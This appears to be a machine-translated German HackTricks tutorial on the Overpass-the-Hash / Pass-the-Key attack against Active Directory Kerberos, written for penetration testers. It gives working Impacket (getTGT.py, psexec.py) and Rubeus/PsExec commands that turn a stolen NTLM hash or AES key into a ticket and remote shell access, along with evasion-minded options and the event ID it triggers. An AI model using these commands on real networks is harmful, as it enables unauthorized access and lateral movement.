hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
2024-02-10 15:36:32 +00:00

5.3 KiB

Überwinden Sie den Hash/Übergeben Sie den Schlüssel

Lernen Sie das Hacken von AWS von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Überwinden Sie den Hash/Übergeben Sie den Schlüssel (PTK)

Der Angriff Überwinden Sie den Hash/Übergeben Sie den Schlüssel (PTK) ist für Umgebungen konzipiert, in denen das traditionelle NTLM-Protokoll eingeschränkt ist und die Kerberos-Authentifizierung Vorrang hat. Dieser Angriff nutzt den NTLM-Hash oder die AES-Schlüssel eines Benutzers, um Kerberos-Tickets anzufordern und unbefugten Zugriff auf Ressourcen innerhalb eines Netzwerks zu ermöglichen.

Um diesen Angriff auszuführen, besteht der erste Schritt darin, den NTLM-Hash oder das Passwort des angegriffenen Benutzerkontos zu erlangen. Nachdem diese Informationen gesichert wurden, kann ein Ticket Granting Ticket (TGT) für das Konto erhalten werden, was es dem Angreifer ermöglicht, auf Dienste oder Maschinen zuzugreifen, für die der Benutzer Berechtigungen hat.

Der Prozess kann mit den folgenden Befehlen eingeleitet werden:

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Für Szenarien, die AES256 erfordern, kann die Option -aesKey [AES-Schlüssel] verwendet werden. Darüber hinaus kann das erhaltene Ticket mit verschiedenen Tools wie smbexec.py oder wmiexec.py verwendet werden, um den Angriffsbereich zu erweitern.

Probleme wie PyAsn1Error oder KDC kann den Namen nicht finden werden in der Regel durch Aktualisierung der Impacket-Bibliothek oder Verwendung des Hostnamens anstelle der IP-Adresse gelöst, um die Kompatibilität mit dem Kerberos KDC sicherzustellen.

Eine alternative Befehlssequenz mit Rubeus.exe zeigt eine weitere Facette dieser Technik:

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Diese Methode spiegelt den Ansatz von Pass the Key wider und konzentriert sich darauf, das Ticket direkt für Authentifizierungszwecke zu übernehmen und zu nutzen. Es ist wichtig zu beachten, dass die Initiierung einer TGT-Anforderung das Ereignis 4768: Ein Kerberos-Authentifizierungsticket (TGT) wurde angefordert auslöst, was standardmäßig auf RC4-HMAC hinweist, obwohl moderne Windows-Systeme AES256 bevorzugen.

Um den operationellen Sicherheitsstandards zu entsprechen und AES256 zu verwenden, kann der folgende Befehl angewendet werden:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Referenzen

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!